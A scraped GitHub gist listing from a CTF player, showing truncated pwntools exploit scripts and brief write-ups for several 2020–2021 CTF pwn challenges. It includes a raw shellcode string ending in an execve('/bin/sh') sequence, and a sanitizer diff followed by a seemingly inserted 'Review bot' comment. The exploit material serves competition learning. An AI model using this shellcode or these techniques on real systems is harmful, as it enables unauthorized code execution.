🔍
Looking for zero days

Faith farazsth98

🔍
Looking for zero days
View GitHub Profile
diff --git a/sanitizers.c b/sanitizers.c
index 78d8fafc..1c905d97 100644
--- a/sanitizers.c
+++ b/sanitizers.c
@@ -23,7 +23,6 @@
"symbolize=1:" \
"detect_leaks=0:" \
"disable_coredump=0:" \
- "detect_odr_violation=0:" \
"allocator_may_return_null=1:" \
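Review bot: dropping the "detect_odr_violation=0:" line re-enables ASan's One-Definition-Rule checking at its default level, so a sanitized build that previously tolerated duplicate global definitions across the main binary and its shared objects will now report them at startup; the hunk itself is fine (each remaining line still ends in ':" \', so the options string stays one correctly concatenated literal), but the change should state that the behaviour switch is intentional and that the fuzzing target was checked to start cleanly with ODR detection on, since the hunk header counts 7 lines becoming 6 while only part of that context is shown here.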
@farazsth98
farazsth98 / secret_pwnhub_academy_rewards_club_2.py
Created October 26, 2020 10:04
Secret Pwnhub Academy Awards Club 2 exploit script from Hack.lu CTF 2020 (ugly)
#!/usr/bin/env python3
from pwn import *
context.arch = "sparc"
elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)
shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
#!/usr/bin/env python3
from pwn import *
elf = ELF("./shadowstuck")
libc = ELF("./libc-2.31.so")
#p = process("./shadowstuck", env={"LD_PRELOAD": "./libc-2.31.so"})
p = remote("challenges.ctf.kaf.sh", 8000)
'''

Functionality

At the beginning, the binary lets you enter 0x20 bytes for your name. This is stored in the bss section, and it is not null terminated. After this, you get the following menu options:

  1. Show Name - Shows you your name
  2. Write Diary - Lets you allocate a page of max 0x80 size. The first four bytes of this page chunk stores the size you choose, and then the rest is the content you enter. calloc is used to allocate this chunk. This chunk's pointer is stored in an array immediately after your name in the bss section (meaning the name can be aligned to it and you can leak it using option 1). You can have a max of 14 pages.
  3. Read Diary - Lets you pick a page index, and the corresponding page contents are output to you (using puts).
  4. Edit Diary - Lets you pick a page index to edit. It will use the size stored in the first 4 bytes of the page chunk to determine how many bytes you can edit. The page index you enter is signed, so there is a bug here (you can enter negative
# Writeup at https://faraz.faith/2020-11-23-dragonctf-bitmapmanager/
# Credits to https://twitter.com/RBTree_
import struct
from pwn import *
def make_image(length, check):
    t = b"BM" # signature
    t += struct.pack("<I", length) # file size
    t += b'\x00' * 4 # reserved, has to be 0

I spent around 3 hrs solving this. I wish I had more time to spend on this CTF because the challenges looked really good!

Challenge

Basically just a Java heap pwn challenge. You can create and edit chunks, but it's done through a JNI function written in C, which means memory corruption is a possibility.

#!/usr/bin/env python3
from pwn import *
context.arch = "amd64"
'''
Bug 1 - printf(hanger[msg]) in the display() function is a format
string bug. My exploit doesn't use it though.
@farazsth98
farazsth98 / harekaze_mini_ctf_2020.md
Last active February 27, 2021 05:24
Harekaze mini CTF 2020

I played Harekaze Mini CTF 2020 for about 3 hours this weekend. The pwn challenges were nice (I especially enjoyed nm-game-extreme). Here are some short writeups.

shellcode

The program just tells you to provide shellcode that will execute execve("/bin/sh", NULL, NULL). It gives you the address of the "/bin/sh" string, so you just create shellcode to do the job and send it:

#!/usr/bin/env python3

from pwn import *
@farazsth98
farazsth98 / notepad.md
Last active February 22, 2021 09:44
Union CTF 2021 - notepad

Here's a cool notepad! We heard that Bjarne Stroustrup himself uses it to manage his notes. Does that make it... notepad++?

nc 35.205.119.236 1337

Author: mrtumble & nankeen

Solves: 10

Functionality

@farazsth98
farazsth98 / custom.md
Last active February 28, 2021 10:29
AeroCTF 2021 - Custom

Just another object creation primitive. Please, obtain the flag.

custom.tar.gz

nc 151.236.114.211 17102

Hint: FROM mcr.microsoft.com/dotnet/runtime:5.0

Author: keltecc (Discord)